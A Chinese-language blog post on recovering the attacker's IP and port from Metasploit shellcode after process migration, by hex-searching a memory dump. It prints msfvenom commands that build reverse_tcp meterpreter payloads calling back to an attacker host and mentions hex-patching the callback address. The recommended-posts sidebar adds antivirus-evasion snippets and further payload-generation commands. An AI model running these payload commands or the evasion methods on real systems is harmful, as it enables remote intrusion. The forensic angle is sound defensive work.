msf原生shellcode迁移进程后如何获取攻击者ip

最新推荐文章于 2024-06-17 17:04:42 发布
最新推荐文章于 2024-06-17 17:04:42 发布
阅读量405 收藏 5
点赞数 9
文章标签: 网络 网络协议 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/139664001
版权

msf原生shellcode迁移进程后如何获取攻击者ip仅为ip及端口
木有图,看一下就晓得了
偶尔看到了这个问题,做了一些倒推测试之后得出来的结果

倒推过程
shellcode
msf生成一段shellcode,产生的一组16进制数据

msfvenmon  -p windows/meterpreter/reverse_tcp LHOST=192.168.157.13 LPORT=1111 -f c

产生的16进制数据会带有ip以及端口信息,直接将ip和端口转换为16进制 c0 a8 9d 0d 0457,然后ctrf+f大法可以直接搜索到对应位置
在产生的文件中是以 0457 c0a8 9d0d 显示的

生成exe格式

msfvenmon  -p windows/meterpreter/reverse_tcp LHOST=192.168.157.13 LPORT=1111 -f exe -o shell.exe

使用od展开shell.exe

od -x shell.exe

然后继续使用ctrf+f大法,会发现exe中的ip端口是以 a8c0 0d9d 5704 排列的,那么进入到正文

创建监听,将生成的exe丢到目标机上以管理员身份运行,迁移进程 migrate 这里以svchost为例,迁移之后,使用任务管理器找到对应的pid创建转储文件,会生成svchost.dmp文件,依旧老套路

od -x scvhost.dmp

以16进制打开 使用ctrf+f大法直接搜索a8 (c0太多了,看不过来)

其实这里的shellcode也是以 a8c0 0d9d 5704 排列

那么找一个在线16进制编译器,将上文生成的shell.exe的a8c0 0d9d 5704 修改为另外一个kali监听的ip以及端口,正常执行后也是可以获取倒shell的

但是,这都是倒推,已经有了攻击者ip以及端口进行反向查找

正向推断,有以下几个问题

如果获取到的dmp文件内容全部转换为10进制,那么全都是数字,无法进行有效识别

如果不确定迁移的进程位置是否需要整个操作系统dump内存进行查到,又会回到第一个问题

问过带佬后,得出一个可能可行的路线

卡巴斯基内存扫描获取木马签名,使用Volatility进行yara规则匹配,然后dump内存,转换为10进制

首先让不让安装卡巴另说,操作系统dump也忒大了

当然了 通过查看网络连接等其他方式也是可以获取到攻击者ip以及端口的

有别的想法的老哥可以私信

天下是个小趴菜
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
4.1 MSF 制作shellcode,且运行
qq_55202378的博客
08-25 3426
msf shellcode
MSF实战免杀过静态:ShellCode加花指令
xf555er的博客
03-30 1163
第一部分(api_call)是一个通用API调用函数,用于动态查找和调用API。第二部分(reverse_tcp)创建一个反向TCP连接,将本地机器连接到攻击者的监听器。第三部分(recv)负责接收并执行第二阶段Payload。这三部分共同实现了一段完整的Shellcode,用于反向连接攻击者机器并执行远程指令。
免杀对抗-ShellCode上线+回调编译执行+混淆变异算法
xiaoheizi的博客
09-10 2986
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。我们经常在CS里面生成指定编程语言的payload,而这个payload里面就是一段十六进制的机器码。2.将shellcode放到执行脚本中(使用的调用执行方式是:申请动态内存加载),利用C/C++语言编译成exe执行文件。因为shellcode的免杀手段多,损坏的可能性小,能自定义更多选择。3.将新的shellcode放到自写的执行脚本xor.cpp中,使用。
木马免杀(篇二)shellcode 学习
Goodric的博客
08-10 1702
shellcode 是一段利用软件漏洞进行执行的机器码, 通常用汇编语言编写并被翻译为十六进制操作码,因常被攻击者用于获取系统的命令终端shell 接口,所以被称为 shellcode。说到获取系统的命令终端shell 接口,shell 是操作系统中提供给用户用于内核交互执行任意系统命令的应用程序。Windows操作系统中的shell 包括 命令提示符cmd 和 powershell 应用程序。Linux操作系统中的 bash shell
使用MSF生成shellcode
weixin_34092455的博客
04-02 1036
使用MSF生成shellcode payload和shellcode的区别 Payload是是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的,ShellCode是真正的被输入到存在漏洞的程序中的,并且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说,ShellCode就...
msf攻击Mysql服务.docx
04-26
**MySQL服务的MSF攻击详解** ...总之,MSF提供的MySQL攻击模块为攻击者提供了一套强大的工具,但同时也提醒我们作为系统管理员,必须时刻保持警惕,采取有效的安全措施来保护MySQL服务器免受侵害。
msf攻击FTP 服务.docx
04-26
通过图文并茂的方式详细描述了利用msf框架进行ftp攻击的过程,文中包含了命令和步骤,很详细,给初学者作为参考。
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
Msf攻击Win7
07-09
攻击者首先需要收集目标Win7主机的信息,包括IP地址、操作系统版本、开放的服务等。这些信息可以通过网络扫描工具,如Nessus,来获取。 【Nessus】是一个强大的网络漏洞扫描器,可用于识别网络设备、服务器和应用...
远程线程注入工具,可生成代码 可自定义shellcode注入进程-易语言
06-14
程序界面,可自定义任意shellcode 注入任意进程 此程序自带将msf的远控shellcode转换成 易语言 可调用的shellcode 同时还可以将注入的功能生成出自己的程序可调用的代码 双击第三个输入框即可生成shellcode,这里...
python加载shellcode免杀 简介
whatday的专栏
10-02 4592
前言 本文整理自小迪师傅近期课程以及本人实验时所踩的一些坑和思路。文章由浅入深,可以让你从免杀小白到免杀入门者,能够绕过火绒和360等国内主流安全软件,成功上线msf。本人也是刚接触免杀,若有说得不对的地方,欢迎大佬们及时提出指正。关于本人在实验过程中所踩的一些坑会在文中提醒大家,让大家尽量少入坑。 注:以下实验截图均为本人发稿时重新测试所截 0X00 基础概念 1. python ctypes模块介绍 ctypes是 Python的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 D...
免杀基本知识,shellcode混淆免杀
最新发布
白帽子凯哥聊黑客
06-17 892
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
msf shellcode分离免杀技术
good good study
05-27 1915
一般的shellcode是直接放在程序里面执行,分离免杀是将恶意代码放置在程序本身之外的一种加载方式。本实验轻松绕过最新版火绒和360 msf免杀 shellcode分离免杀
Kali的学习笔记篇(八)使用msf生成的shellcode制作免杀payload
Kind&红衣的博客
08-13 6507
环境:     kali-linux-2018.2-amd.iso       Visual Studio 2017     msfvenom    更新时间:2018年8月13日07:06:43 直接注入的生成方式(一): //生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码 root@kali:~# msfvenom -p wi...
使用MSF生成的shellcode打造免杀payload
热门推荐
MickeyMouse1928的博客
05-04 1万+
环境: 1.Kali攻击机IP:192.168.114.140 2.使用win7生成exe 步骤: 使用msfvenom生成shellcodemsfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c win7中使用Visual studio创建Win32控制台
MSF-Shellcode生成和使用
weixin_34301307的博客
11-12 4694
1使用环境 Kali 2.0 msfvenom 2Msfvenom参数说明 msfvenom –h 查看帮助 说明: Options: -p, --payload <payload>指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&...
使用MSF打造各种ShellCode
weixin_30824599的博客
03-20 2179
MSF 生成各种后门 Windows: 生成Windows后门. msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe Linux...
使用msfpayload生成shellcode
11-10 5458
在看0day安全:软件漏洞分析技术的时候需要用到shellcode,照着上面的写个
msf生成shellcode
06-28
MSF生成shellcode是一种常见的渗透测试技术,可以用于获取目标系统的控制权。使用MSF生成shellcode需要掌握一定的技术知识和经验,包括了解目标系统的漏洞、了解不同类型的shellcode以及使用MSF生成工具等。通过合理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值